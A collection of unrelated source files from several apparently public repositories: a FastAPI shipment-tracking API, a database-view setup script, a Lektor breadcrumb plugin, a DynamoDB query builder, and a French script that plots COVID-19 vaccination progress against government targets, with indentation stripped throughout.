dependencies=[Depends(vbr_read_public)],
response_model=List[Container],
)
def get_containers_in_shipment(
tracking_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get Containers in a Shipment.
Requires: **VBR_READ_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
# TODO - change name of field to shipment_tracking_id after updating containers_public.sql
query = {"tracking_id": {"operator": "=", "value": tracking_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="containers_public",
query=query,
limit=0,
offset=0,
)
]
return rows
# PUT /tracking/{tracking_id}/containers - add a container to a shipment
@router.put(
"/tracking/{tracking_id}/container",
dependencies=[Depends(vbr_write_public)],
response_model=List[Container],
)
def add_container_to_shipment(
tracking_id: str,
body: AddContainer = Body(...),
client: Tapis = Depends(vbr_admin_client),
):
"""Add a Container to a Shipment.
Requires: **VBR_WRITE_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
container_id = sanitize_identifier_string(body.container_id)
try:
shipment = client.get_shipment_by_tracking_id(tracking_id)
except Exception:
raise HTTPException(
status_code=404, detail="Shipment {0} not found".format(tracking_id)
)
try:
container = client.get_container_by_local_id(container_id)
except Exception:
raise HTTPException(
status_code=404, detail="Container {0} not found".format(container_id)
)
try:
location = client.get_location(shipment.ship_from)
except Exception:
raise HTTPException(
status_code=404, detail="Location {0} not found".format(shipment.ship_from)
)
try:
client.associate_container_with_shipment(container, shipment)
except Exception:
raise HTTPException(
status_code=500, detail="Failed to associate container with shipment"
)
try:
client.relocate_container(container, location, sync=False)
except Exception:
raise HTTPException(
status_code=500, detail="Failed to update container location"
)
# Display updated list of containers associated with shipment
query = {"tracking_id": {"operator": "=", "value": tracking_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="containers_public",
query=query,
limit=0,
offset=0,
)
]
return rows
# DELETE /tracking/{tracking_id}/containers/{container_id} - remove a container from a shipment
@router.delete(
"/tracking/{tracking_id}/container/{container_id}",
dependencies=[Depends(vbr_write_public)],
response_model=List[Container],
)
def remove_container_from_shipment(
tracking_id: str,
container_id: str,
client: Tapis = Depends(vbr_admin_client),
):
"""Remove a Container from a Shipment.
Requires: **VBR_WRITE_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
container_id = sanitize_identifier_string(container_id)
container = client.get_container_by_local_id(container_id)
client.disassociate_container_from_shipment(container)
# Display updated list of containers associated with shipment
query = {"tracking_id": {"operator": "=", "value": tracking_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="containers_public",
query=query,
limit=0,
offset=0,
)
]
return rows
# PATCH /tracking/{tracking_id}/status - update status by name
@router.patch(
"/tracking/{tracking_id}/status",
dependencies=[Depends(vbr_write_public)],
response_model=Shipment,
)
def update_shipment_status(
tracking_id: str,
body: SetShipmentStatus = Body(...),
client: Tapis = Depends(vbr_admin_client),
):
"""Update a Shipment status
Setting `relocate_containers=true` in the message body
when event name is `received` will move all containers
associated with the shipment to the shipment destination.
Requires: **VBR_WRITE_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
shipment = client.get_shipment_by_tracking_id(tracking_id)
shipment = client.update_shipment_status_by_name(
shipment, status_name=body.status.value, comment=body.comment
)
# TODO - take any requisite actions associated with specific statuses
if body.status.value == "received" and body.relocate_containers is True:
to_location = client.get_location(shipment.ship_to)
containers = client.get_containers_for_shipment(shipment)
for container in containers:
client.relocate_container(container, to_location, sync=False)
query = {"shipment_id": {"operator": "eq", "value": shipment.local_id}}
row = transform(
client.vbr_client.query_view_rows(
view_name="shipments_public", query=query, limit=1, offset=0
)[0]
)
return row
# GET /tracking/{tracking_id}/events
@router.get(
"/tracking/{tracking_id}/events",
dependencies=[Depends(vbr_read_public)],
response_model=List[Event],
)
def get_events_for_shipment(
tracking_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get Events for a Shipment.
Requires: **VBR_READ_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
# TODO - change name of field to shipment_tracking_id after updating containers_public.sql
query = {"shipment_tracking_id": {"operator": "=", "value": tracking_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="shipments_data_events_public",
query=query,
limit=0,
offset=0,
)
]
return rows
# GET /tracking/{tracking_id}/comments
@router.get(
"/tracking/{tracking_id}/comments",
dependencies=[Depends(vbr_read_public)],
response_model=List[Comment],
)
def get_comments_for_shipment(
tracking_id: str,
client: VBR_Api = Depends(vbr_admin_client),
):
"""Get Comments for a Shipment.
Requires: **VBR_READ_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
# TODO - change name of field to shipment_tracking_id after updating containers_public.sql
query = {"shipment_tracking_id": {"operator": "=", "value": tracking_id}}
rows = [
transform(c)
for c in client.vbr_client.query_view_rows(
view_name="shipments_comments_public",
query=query,
limit=0,
offset=0,
)
]
return rows
@router.post(
"/tracking/{tracking_id}/comments",
dependencies=[Depends(vbr_write_public)],
response_model=Comment,
)
def add_shipment_comment(
tracking_id: str,
body: CreateComment = Body(...),
client: VBR_Api = Depends(vbr_admin_client),
):
"""Add a Comment to a Shipment.
Requires: **VBR_WRITE_PUBLIC**"""
tracking_id = sanitize_identifier_string(tracking_id)
shipment = client.get_shipment_by_tracking_id(tracking_id)
data_event = client.create_and_link(comment=body.comment, link_target=shipment)[0]
return Comment(comment=data_event.comment, timestamp=data_event.event_ts)
# TODO
# POST / - create new shipment
```
#### File: vbr-app/application/version.py
```python
import os
__all__ = ["get_version"]
API_VERSION = "0.3.1"
def get_version():
# This is optionally provided by the hosting container
BUILD_VERSION = os.environ.get("BUILD_VERSION", None)
if BUILD_VERSION is not None and BUILD_VERSION != "":
return "{0}-{1}".format(API_VERSION, BUILD_VERSION)
else:
return API_VERSION
```
#### File: vbr-app/scripts/create_views.py
```python
import argparse
import os
import re
import sys
# import sqlfluff
from tapipy.tapis import Tapis
from vbr.client.connection import TapisDirectClient
VIEWS_PATH = "./views"
def delete_view(view_name: str, client: Tapis):
views = client.pgrest.list_views()
for view in views:
if view.view_name == view_name or view.root_url == view_name:
client.pgrest.delete_view(view_name=view.manage_view_id)
def load_sql(filename: str, tenant_id: str, replace: bool = False) -> str:
with open(filename) as f:
sql = f.read()
sql = sql.strip()
sql = re.sub(r"\s+", " ", sql)
return sql
def construct_view(filename: str, raw_sql: str, comments: str = None) -> dict:
view_name = os.path.basename(filename)
view_name = re.sub(r".sql$", "", view_name)
# TODO - extract first line comment -- formatted as /* comment goes here */
# Transform SQL into
if not raw_sql.endswith(";"):
raw_sql = raw_sql + ";"
if not raw_sql.startswith("AS "):
raw_sql = "AS " + raw_sql
return {"view_name": view_name, "raw_sql": raw_sql, "comments": comments}
def main(arg_vals):
t = Tapis(
base_url=arg_vals["base_url"],
username=arg_vals["username"],
password=arg_vals["password"],
)
t.get_tokens()
tenant_id = t.tenant_id
client = TapisDirectClient(t)
client.setup("pgrest", api_path="manage/views")
view_sql_files = [f for f in os.listdir(VIEWS_PATH) if not f.startswith(".")]
base_views = []
child_views = []
for view_file in view_sql_files:
if arg_vals["view_names"] != []:
if view_file not in arg_vals["view_names"] or not view_file.endswith(
".sql"
):
continue
raw_sql = load_sql(os.path.join(VIEWS_PATH, view_file), tenant_id, False)
data = construct_view(view_file, raw_sql)
if "base" in data["view_name"]:
base_views.append(data)
else:
child_views.append(data)
print(len(base_views), "base views found")
print(len(child_views), "child views found")
# Create views
# TODO - Check for existence and delete
for view in base_views:
try:
# try:
# client.setup("pgrest", api_path="manage/views/" + view["view_name"])
# resp = client.delete()
# print("Deleted {0}".format(view["view_name"]))
# client.setup("pgrest", api_path="manage/views")
# except Exception as exc:
# # TODO - better error checking and reporting
# print(exc)
resp = client.post(data=view)
print("Created " + view["view_name"])
except Exception as exc:
print(exc)
for view in child_views:
try:
resp = client.post(data=view)
print("Created " + view["view_name"])
except Exception as exc:
print(exc)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-H",
type=str,
default=os.environ.get("TAPIS_BASE_URL"),
dest="base_url",
help="Tapis API Base URL",
)
parser.add_argument(
"-U",
type=str,
dest="username",
default=os.environ.get("TAPIS_USERNAME"),
help="Tapis Username",
)
parser.add_argument(
"-P",
type=str,
dest="password",
default=os.environ.get("TAPIS_PASSWORD"),
help="Tapis Password",
)
parser.add_argument("view_names", nargs="*", help="Optional view name(s)")
args = parser.parse_args()
main(vars(args))
``` |
{
"source": "a2csuga/lektor-root-relative-path",
"score": 2
} |
#### File: a2csuga/lektor-root-relative-path/lektor_root_relative_path.py
```python
try:
# py3
from urllib.parse import urljoin, quote
except ImportError:
# py2
from urlparse import urljoin
from urllib import quote
from lektor.pluginsystem import Plugin
from furl import furl
class RootRelativePathPlugin(Plugin):
name = u'root-relative-path'
description = u'Returns root relative path list as tuple like \
[(toppage_url, toppage_name), ...(parent_url, parent_name), (url, name)]'
def on_setup_env(self, **extra):
navi_top_page_name = self.get_config().get('navi_top_page_name') or 'Top Page'
def root_relative_path_list(current_url):
url = '/'
name = navi_top_page_name
path_list = [(url, name)]
# furl('/blog').path.segments retunrs ['/blog']
# But furl('/').path.segments retunrs ['']
# insted []. So return value here before in to the loop
if current_url == '/':
return path_list
for i in furl(current_url).path.segments:
url = quote(urljoin(url, '%s' % i))
name = i
path_list.append((url, name))
url = url + '/'
return path_list
self.env.jinja_env.filters['root_relative_path_list'] = root_relative_path_list
``` |
{
"source": "a2d24/botoful",
"score": 2
} |
#### File: botoful/botoful/query.py
```python
from __future__ import annotations
import copy
import numbers
from functools import wraps, reduce
from typing import List, Set, Union
from .filters import build_filter, Filter, ConditionBase
from .reserved import RESERVED_KEYWORDS
from .serializers import deserialize, serialize
def fluent(func):
# Decorator that assists in a fluent api.
# It clones the current 'self', calls the wrapped method on the clone and returns the clone
@wraps(func)
def fluent_wrapper(self, *args, **kwargs):
new_self = copy.deepcopy(self)
return func(new_self, *args, **kwargs)
return fluent_wrapper
class QueryResult:
def __init__(self, items=None, next_token=None, model=None):
if items is None:
items = []
self.items = [model(**item) for item in items] if model else items
self.count = len(items)
self.next_token = next_token
self._model = model
class Condition:
def __init__(self, key, operator, value):
self.key = key
self.operator = operator
self.value = value
def as_key_condition_expression(self):
if self.operator == '=':
return f"{self.key} = :{self.raw_key}"
elif self.operator == 'begins_with':
return f"begins_with ({self.key}, :{self.raw_key})"
elif self.operator == 'gte':
return f"{self.key} >= :{self.raw_key}"
elif self.operator == 'lte':
return f"{self.key} <= :{self.raw_key}"
elif self.operator == 'gt':
return f"{self.key} > :{self.raw_key}"
elif self.operator == 'lt':
return f"{self.key} < :{self.raw_key}"
elif self.operator == 'between':
return f"{self.key} BETWEEN :{self.raw_key}_lower AND :{self.raw_key}_upper"
raise NotImplementedError(f"Operator {self.operator} is currently not supported")
def as_expression_attribute_values(self, params):
if self.operator == 'between':
lower = self.value[0].format(**params) if isinstance(self.value[0], str) else self.value[0]
upper = self.value[1].format(**params) if isinstance(self.value[0], str) else self.value[1]
return {
f":{self.raw_key}_lower": serialize(lower),
f":{self.raw_key}_upper": serialize(upper),
}
_key = f":{self.raw_key}"
if isinstance(self.value, str):
return {_key: serialize(self.value.format(**params))}
if isinstance(self.value, numbers.Number):
return {_key: serialize(self.value)}
@property
def raw_key(self):
return f"{self.key[1:]}" if self.key.startswith('#') else self.key
class Query:
def __init__(self, table=None):
self.table = table
self._max_items = None
self._index = None
self._key_conditions: List[Condition] = []
self._named_variables: Set[str] = set()
self._attributes_to_fetch: Set[str] = set()
self._filter: Union[Filter, None] = None
self._page_size = None
self._consistent_read = False
self._scan_index_forward = True
@fluent
def page_size(self, page_size) -> Query:
self._page_size = page_size
return self
def limit(self, limit) -> Query:
return self.page_size(page_size=limit)
@fluent
def index(self, index_name: str) -> Query:
self._index = index_name
return self
@fluent
def key(self, **kwargs) -> Query:
for key, condition in kwargs.items():
if len(self._key_conditions) >= 2:
raise ValueError("The key method can take a maximum of two keyword arguments")
tokens = key.split('__') if '__' in key else (key, '=')
key = self._name_variable(tokens[0])
operator = tokens[1]
self._key_conditions.append(Condition(key=key, operator=operator, value=condition))
return self
@fluent
def attributes(self, keys: List[str]):
self._attributes_to_fetch.update(keys)
return self
@fluent
def filter(self, condition: ConditionBase):
self._filter = condition
return self
@fluent
def consistent(self, consistent_read: bool=True):
self._consistent_read = consistent_read
return self
@fluent
def forwards(self):
self._scan_index_forward = True
return self
@fluent
def backwards(self):
self._scan_index_forward = False
return self
def _name_variable(self, variable):
if variable.upper() not in RESERVED_KEYWORDS:
return variable
self._named_variables.add(variable)
return f"#{variable}"
def build(self, params, starting_token=None):
result = {}
expression_attribute_names = {}
expression_attribute_values = {}
if self.table:
result['TableName'] = self.table
if self._page_size:
result['PaginationConfig'] = dict(
MaxItems=self._page_size,
PageSize=self._page_size,
StartingToken=starting_token
)
if self._index:
result['IndexName'] = self._index
if self._key_conditions:
result['KeyConditionExpression'] = " AND ".join(
(c.as_key_condition_expression() for c in self._key_conditions)
)
expression_attribute_values.update(
reduce(lambda a, b: {**a, **b},
[
c.as_expression_attribute_values(params=params) for c in self._key_conditions
]))
else:
raise RuntimeError("No key conditions specified for query. A query requires at least one key condition")
if self._named_variables:
expression_attribute_names.update({f"#{var}": var for var in self._named_variables})
# Build ProjectionExpression
if self._attributes_to_fetch:
result['ProjectionExpression'] = ', '.join(
[f"#{attr}" if attr.upper() in RESERVED_KEYWORDS else attr for attr in self._attributes_to_fetch]
)
reserved_keywords_attributes = list(
filter(lambda item: item.upper() in RESERVED_KEYWORDS, self._attributes_to_fetch))
if reserved_keywords_attributes:
expression_attribute_names.update({f"#{attr}": attr for attr in reserved_keywords_attributes})
if self._filter:
filter_to_apply = build_filter(self._filter)
expression_attribute_names.update(filter_to_apply.name_placeholders)
expression_attribute_values.update(filter_to_apply.value_placeholders)
result['FilterExpression'] = filter_to_apply.expression
if self._consistent_read:
result['ConsistentRead'] = self._consistent_read
# Default for ScanIndexForward is True, so set only if this value is False
if not self._scan_index_forward:
result['ScanIndexForward'] = self._scan_index_forward
if expression_attribute_names:
result['ExpressionAttributeNames'] = expression_attribute_names
if expression_attribute_values:
result['ExpressionAttributeValues'] = expression_attribute_values
return result
def preview(self, params=None, starting_token=None):
if params is None:
params = {}
import json
print(json.dumps(self.build(params=params, starting_token=starting_token), indent=2))
def execute(self, client, starting_token=None, model=None, params=None) -> QueryResult:
if params is None:
params = {}
if not self.table:
raise RuntimeError("Queries cannot be executed without a table name specified")
paginator = client.get_paginator('query')
query = self.build(params=params, starting_token=starting_token)
response = paginator.paginate(**query).build_full_result()
items = [deserialize(item) for item in response.get('Items')]
next_token = response.get('NextToken')
return QueryResult(items=items, next_token=next_token, model=model)
def execute_paginated(self, starting_token=None, *args, **kwargs) -> QueryResult:
while True:
result = self.execute(*args, **kwargs, starting_token=starting_token)
yield result
starting_token = result.next_token
if starting_token is None:
break
``` |
{
"source": "A2drien/VaccineGraph",
"score": 2
} |
#### File: VaccineGraph/Archives Objectifs Gouvernement/scriptObjectifGouvernement.py
```python
from urllib import request
import urllib.request
from operator import itemgetter
import matplotlib.pyplot as plt
import numpy as np
import os
#Paramètres du graphique
limite_date_debut = "2020-12-29" #Indique la première date des données (0 pour conserver la liste)
limite_date_fin = "2021-08-31" #Exclure les données à partir d'une certaine date (0 pour conserver la liste)
limite_nombre_jour = 0 #Indique le nombre de dates à inscrire sur l'axe des abscisses (0 ou 1 conserve la liste)
limite_ecart_jour = 7 #Espace de n jours les dates (1 pour conserver la liste)
nb_jour_prediction = 7 #Fait des prévisions sur les jours suivants à partir des n derniers jours
y_min = 0 #Définit le pourcentage minimum affiché
y_max = 100 #Définit le pourcentage maximum affiché
#Liste des objectifs
obj_1_dose = 50000000 #50 000 000 primo-vaccinés
obj_tot_dose = 40000000 #40 000 000 vaccinés
obj_50_ans_1_dose = 0.85 #85% des +50 ans primo-vaccinés
obj_18_ans_1_dose = 0.75 #75% des +18 ans primo-vaccinés
obj_18_ans_tot_dose = 0.66 #66% des +18 ans complétement vaccinés
#Données sur la population (Insee, 2021) (https://www.insee.fr/fr/outil-interactif/5367857/details/20_DEM/21_POP/21C_Figure3#)
pop_50_ans = 27824662 #27 824 662 Français ont plus de 50 ans
pop_18_ans = 53761464 #53 761 464 Français ont plus de 18 ans
#Paramètres du fichier de données
lieu_telechargement = "Archives Données/"
#Sert à limiter une liste à limite_nombre_jour de manière uniforme
def reduction(liste):
if limite_nombre_jour == 0 or limite_nombre_jour == 1: return liste #limite_nombre_jour ne doit pas être égal à 0 ou 1 (risque d'erreur)
liste_compressee = []
coeff = len(liste)/(limite_nombre_jour-1) #Calcule l'écart idéal entre 2 éléments de la liste à compresser
liste_compressee.append(liste[0]) #Ajoute le premier élement de la liste à compresser
for i in range(len(liste)):
if int(i/coeff) == len(liste_compressee): #Si la position de l'élément est supérieure ou égale à sa position dans la liste compressée
liste_compressee.append(liste[i-1]) #Alors ajouter l'élément à la liste compressée
liste_compressee.append(liste[-1]) #Ajoute le dernier élément de la liste dans la liste à compresser
return liste_compressee
#Sert à la projection des courbes
def projectionObjectif(liste):
coeff = (liste[-1]-liste[-1-nb_jour_prediction])/nb_jour_prediction #Évolution de la courbe calculé à partir des 7 derniers jours
while len(liste_dates) != len(liste): liste.append(liste[-1]+coeff) #Tant que la projection n'égale pas la date de fin, continuer la projection
return liste
#Sert à espacer les dates selon limite_ecart_jour
def ecartDate(liste):
new_liste = []
for i in range(len(liste)):
if i % limite_ecart_jour == 0: new_liste.append(liste[i])
return new_liste
def formatNombre(nombre):
nombre = str(nombre)
j = 0
for i in range(1,len(nombre)):
if i%3 == 0:
nombre = nombre[:-i-j] + " " + nombre[-i-j:]
j += 1
return nombre
#Sauvegarde temporairement le fichier de données
lignes = str(urllib.request.urlopen("https://www.data.gouv.fr/fr/datasets/donnees-relatives-aux-personnes-vaccinees-contre-la-covid-19-1/").read()).strip("b'").split("\\n")
fichier = open("fichier_temporaire.html", "w")
for ligne in lignes:
if "vacsi-a-fra-" in ligne and "vacsi-a-fra-YYYY-MM-DD-HHhmm.csv" not in ligne:
for i in range(len(ligne)-32):
nom_fichier = ligne[i:i+12]
if nom_fichier == "vacsi-a-fra-":
nom_fichier = ligne[i:i+32]
break
fichier.close()
if os.path.exists(lieu_telechargement+nom_fichier) == False:
lignes = str(request.urlopen("https://www.data.gouv.fr/fr/datasets/r/54dd5f8d-1e2e-4ccb-8fb8-eac68245befd").read()).strip("b'").split("\\n")
fichier = open(lieu_telechargement+nom_fichier, "w")
for ligne in lignes: fichier.write(ligne + "\n")
fichier.close()
#Début du script
fichier = open(lieu_telechargement+nom_fichier, "r") #Ouvre le fichier
ligne_descripteurs = fichier.readline().rstrip().rsplit(";") #Sépare la première ligne (titres des colonnes) du reste des valeurs numériques
lignes = fichier.readlines() #Le reste est entreposée dans "lignes"
table = []
empecher_valeurs_previsionnelles = False #Par défaut, ne pas empêcher de tracer les valeurs prévisionnelles
limite_date_debut_existe = False #Par défaut, ne pas supprimer des dates sans vérifier que la limite de début existe
for ligne in lignes:
ligne = ligne.rstrip().split(";")
if ligne[0] == "": break
del ligne[0] #Supression des valeurs du pays de l'injection (toutes dans le fichier sont en France)
ligne[0] = int(ligne[0]) #Conversion de l'âge des vaccinés en nombre entier (de base une chaine de caractères)
del ligne[2] #Suppression des primo-injections quotidiennes
del ligne[2] #Suppression des injections complètes quotidiennes
ligne[2] = int(ligne[2]) #Conversion du cumul des primo-injections en nombre entier
ligne[3] = int(ligne[3]) #Conversion du cumul des injections complètes en nombre entier
ligne[4] = float(ligne[4]) #Conversion du taux de primo-vaccinés en nombre décimal
ligne[5] = float(ligne[5]) #Conversion du taux de vaccinés en nombre décimal
table.append(ligne)
if ligne[1] == limite_date_debut: limite_date_debut_existe = True #Limiter le nombre de dates si la limite existe dans le fichier
fichier.close() #Ferme le fichier
table = sorted(table, key=itemgetter(1, 0)) #Tri les données par date, puis par âge
#Tant que la date limite de début n'est pas atteinte et si elle existe, continuer de supprimer les données
while limite_date_debut_existe and table[0][1] != limite_date_debut: del table[0]
#Vérifie la présense de données de données ultérieurs à la date limite de fin
for i in range(len(table)):
if table[i][1] == limite_date_fin: #Si c'est le cas...
del table[i+15:] #Supprime ces données
empecher_valeurs_previsionnelles = True #Empêche la signalisation des valeurs prévisionelles (pas besoin)
break #Casse la boucle et empêche d'éventuelles erreurs
#Initialisation des variables des dates et des 7 autres courbes
liste_dates = [] #Stocke la liste des dates en abscisse
primo_injections_18_ans = [] #Stocke la liste du nombre de primo-injections des +18 ans
primo_injections_50_ans = [] #Stocke la liste du nombre de primo-injections +50 ans
primo_injections_totales = [] #Stocke la liste du nombre de primo-injections totales
injections_completes_18_ans = [] #Stocke la liste du nombre d'injections complètes des +18 ans
injections_completes_totales = [] #Stocke la liste du nombre d'injections complètes des +50 ans
proportion_primo_vaccines = [] #Stocke la proportion de primo-vaccinés
proportion_vaccines = [] #Stocke la proportion de complètement vaccinés
#Variables de transition entre les différentes classes d'âges
cumul_primo_injections_18_ans = 0
cumul_injections_completes_18_ans = 0
cumul_primo_injections_50_ans = 0
#Répartit les données dans les différentes listes
for donnees in table:
#Afin de faciliter la compréhension du code, les 6 colonnes sont assignés à des variables
age = donnees[0]
date = donnees[1]
primo_injections = donnees[2]
injections_completes = donnees[3]
taux_primo_vaccines = donnees[4]
taux_vaccines = donnees[5]
#Dans le cas où la ligne concerne les injections tout âge confondu...
if age == 0:
primo_injections_totales.append(primo_injections/obj_1_dose*100)
injections_completes_totales.append(injections_completes/obj_tot_dose*100)
liste_dates.append(date)
proportion_primo_vaccines.append(taux_primo_vaccines)
proportion_vaccines.append(taux_vaccines)
#Dans le cas où la ligne concerne les injections de personnes entre 18 et 49 ans...
elif 18 <= age <= 49:
cumul_primo_injections_18_ans += primo_injections
cumul_injections_completes_18_ans += injections_completes
#Dans le cas où la ligne concerne les injections de personnes entre 50 et 79 ans...
elif 50 <= age <= 79:
cumul_primo_injections_50_ans += primo_injections
cumul_primo_injections_18_ans += primo_injections
cumul_injections_completes_18_ans += injections_completes
#Dans le cas où la ligne concerne les injections de personnes de plus de 80 ans...
elif age == 80:
cumul_primo_injections_50_ans += primo_injections
primo_injections_50_ans.append(cumul_primo_injections_50_ans/pop_50_ans/obj_50_ans_1_dose*100)
cumul_primo_injections_50_ans = 0
cumul_primo_injections_18_ans += primo_injections
cumul_injections_completes_18_ans += injections_completes
primo_injections_18_ans.append(cumul_primo_injections_18_ans/pop_18_ans/obj_18_ans_1_dose*100)
injections_completes_18_ans.append(cumul_injections_completes_18_ans/pop_18_ans/obj_18_ans_tot_dose*100)
cumul_primo_injections_18_ans = 0
cumul_injections_completes_18_ans = 0
position_date_limite = len(liste_dates)-1 #Sauvegarde de la position du dernier jour dont on a les données
dernier_jour = liste_dates[-1] #Sauvegarde le dernier jour existant dans les données
#Sert à créer une liste de dates jusqu'à une date limite de fin (s'il y en a une)
while liste_dates[-1] != limite_date_fin and limite_date_fin != 0:
date = liste_dates[-1]
date = date[0:8] + str(int(date[8:])+1)
if len(date[8:]) == 1: date = date[0:8] + "0" + date[-1]
if date[5:7] == "01" and date[8:10] == "32": date = date[0:5] + "02-01"
elif date[5:7] == "02" and date[8:10] == "29" and int(date[0:4])%4 != 0: date = date[0:5] + "03-01"
elif date[5:7] == "02" and date[8:10] == "30" and int(date[0:4])%4 == 0: date = date[0:5] + "03-01"
elif date[5:7] == "03" and date[8:10] == "32": date = date[0:5] + "04-01"
elif date[5:7] == "04" and date[8:10] == "31": date = date[0:5] + "05-01"
elif date[5:7] == "05" and date[8:10] == "32": date = date[0:5] + "06-01"
elif date[5:7] == "06" and date[8:10] == "31": date = date[0:5] + "07-01"
elif date[5:7] == "07" and date[8:10] == "32": date = date[0:5] + "08-01"
elif date[5:7] == "08" and date[8:10] == "32": date = date[0:5] + "09-01"
elif date[5:7] == "09" and date[8:10] == "31": date = date[0:5] + "10-01"
elif date[5:7] == "10" and date[8:10] == "32": date = date[0:5] + "11-01"
elif date[5:7] == "11" and date[8:10] == "31": date = date[0:5] + "12-01"
elif date[5:7] == "12" and date[8:10] == "32": date = str(int(date[0:4])+1) + "-01-01"
liste_dates.append(date)
#Passe le format de toutes les dates : AAAA-MM-JJ -> JJ/MM
for i in range(len(liste_dates)): liste_dates[i] = liste_dates[i][8:11]+"/"+liste_dates[i][5:7]
liste_dates_reduite = ecartDate(reduction(liste_dates)) #Réduit la liste de dates tout en conservant l'original
#Début de la contruction du graphique
plt.figure(figsize = (16, 5)) #Définit une dimension en 16/5
plt.tick_params(axis = 'x', rotation = 80) #Tourne les dates à 80° afin qu'elles restent visibles
#Trace les courbes continues (non prévisionelles, factuelles)
plt.plot(liste_dates_reduite[:position_date_limite//limite_ecart_jour+1], ecartDate(reduction(projectionObjectif(primo_injections_totales)))[:position_date_limite//limite_ecart_jour+1], "red", label = f"Objectif de primo-vaccinés ({int(obj_1_dose/1000000)} M)")
plt.plot(liste_dates_reduite[:position_date_limite//limite_ecart_jour+1], ecartDate(reduction(projectionObjectif(injections_completes_totales)))[:position_date_limite//limite_ecart_jour+1], "firebrick", label = f"Objectif de vaccinés ({int(obj_tot_dose/1000000)} M)")
plt.plot(liste_dates_reduite[:position_date_limite//limite_ecart_jour+1], ecartDate(reduction(projectionObjectif(primo_injections_50_ans)))[:position_date_limite//limite_ecart_jour+1], "orange", label = f"Objectif des +50 ans primo-vaccinés ({int(obj_50_ans_1_dose*100)}%)")
plt.plot(liste_dates_reduite[:position_date_limite//limite_ecart_jour+1], ecartDate(reduction(projectionObjectif(primo_injections_18_ans)))[:position_date_limite//limite_ecart_jour+1], "lawngreen", label = f"Objectif des +18 ans primo-vaccinés ({int(obj_18_ans_1_dose*100)}%)")
plt.plot(liste_dates_reduite[:position_date_limite//limite_ecart_jour+1], ecartDate(reduction(projectionObjectif(injections_completes_18_ans)))[:position_date_limite//limite_ecart_jour+1], "darkgreen", label = f"Objectif des +18 ans vaccinés ({int(obj_18_ans_tot_dose*100)}%)")
plt.plot(liste_dates_reduite[:position_date_limite//limite_ecart_jour+1], ecartDate(reduction(projectionObjectif(proportion_primo_vaccines)))[:position_date_limite//limite_ecart_jour+1], "cyan", label = "Référence : Français 100% primo-vaccinés")
plt.plot(liste_dates_reduite[:position_date_limite//limite_ecart_jour+1], ecartDate(reduction(projectionObjectif(proportion_vaccines)))[:position_date_limite//limite_ecart_jour+1], "darkblue", label = "Référence : Français 100% vaccinés")
#Trace les courbes discontinues, prévisionnnelles
plt.plot(liste_dates_reduite[position_date_limite//limite_ecart_jour:], ecartDate(reduction(projectionObjectif(primo_injections_totales)))[position_date_limite//limite_ecart_jour:], "red", linestyle = '--')
plt.plot(liste_dates_reduite[position_date_limite//limite_ecart_jour:], ecartDate(reduction(projectionObjectif(injections_completes_totales)))[position_date_limite//limite_ecart_jour:], "firebrick", linestyle = '--')
plt.plot(liste_dates_reduite[position_date_limite//limite_ecart_jour:], ecartDate(reduction(projectionObjectif(primo_injections_50_ans)))[position_date_limite//limite_ecart_jour:], "orange", linestyle = '--')
plt.plot(liste_dates_reduite[position_date_limite//limite_ecart_jour:], ecartDate(reduction(projectionObjectif(primo_injections_18_ans)))[position_date_limite//limite_ecart_jour:], "lawngreen", linestyle = '--')
plt.plot(liste_dates_reduite[position_date_limite//limite_ecart_jour:], ecartDate(reduction(projectionObjectif(injections_completes_18_ans)))[position_date_limite//limite_ecart_jour:], "darkgreen", linestyle = '--')
plt.plot(liste_dates_reduite[position_date_limite//limite_ecart_jour:], ecartDate(reduction(projectionObjectif(proportion_primo_vaccines)))[position_date_limite//limite_ecart_jour:], "cyan", linestyle = '--')
plt.plot(liste_dates_reduite[position_date_limite//limite_ecart_jour:], ecartDate(reduction(projectionObjectif(proportion_vaccines)))[position_date_limite//limite_ecart_jour:], "darkblue", linestyle = '--')
#Trace une zone en gris clair délimitée par une ligne verticales en pointillé pour désigner les prédictions des courbes (si les données n'ont pas été raccourcis)
if empecher_valeurs_previsionnelles == False:
plt.axvline(x = liste_dates_reduite[position_date_limite//limite_ecart_jour], color = 'gray', linestyle = '--')
plt.axvspan(liste_dates_reduite[position_date_limite//limite_ecart_jour], liste_dates_reduite[-1], alpha = 0.5, color = 'lightgray')
plt.yticks(np.arange(y_min, y_max+0.01, 10)) #Limite le maximum en y à 100% et force la création de jalons de 10%
plt.ylim(y_min, y_max+0.01) #Force le tableau à n'afficher y qu'entre 0% et 100%
plt.grid() #Ajout d'un grillage
plt.legend() #Affiche les légendes associés à la courbe correspondante
plt.margins(0, 0) #Force la disparition des marges intérieures
#Défini les titres du graphe et des axes x et y
plt.title(f"État des objectifs gouvernementaux pour la fin août (données du {nom_fichier[20:22]}/{nom_fichier[17:19]}/{nom_fichier[12:16]})")
plt.xlabel(f"""Dates\n\nLes prévisions sont faites à partir des {formatNombre(nb_jour_prediction)} jours précédents. En considérant une population de +18 ans de {formatNombre(pop_18_ans)} habitants et de +50 ans de {formatNombre(pop_50_ans)} habitants (Insee, 2021).
Dernier jour de remontée des données : {dernier_jour[8:]}/{dernier_jour[5:7]}/{dernier_jour[:4]}. Source des données sur Data.gouv et code du graphique disponible sur https://github.com/A2drien/VaccineGraph.""")
plt.ylabel("Pourcentage atteint des objectifs (%)")
#Sauvegarde l'image avec la date des données et supprime et les marges exterieures
plt.savefig(f"Objectifs Gouvernement.png", bbox_inches = 'tight')
plt.savefig(f"Archives Objectifs Gouvernement/Objectifs Gouvernement {nom_fichier[12:22]}.png", bbox_inches = 'tight')
os.remove("fichier_temporaire.html")
``` |
{
"source": "A2ed/affective-recommendation",
"score": 2
} |
#### File: app/recommendation/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from django.shortcuts import redirect
import ast
import random
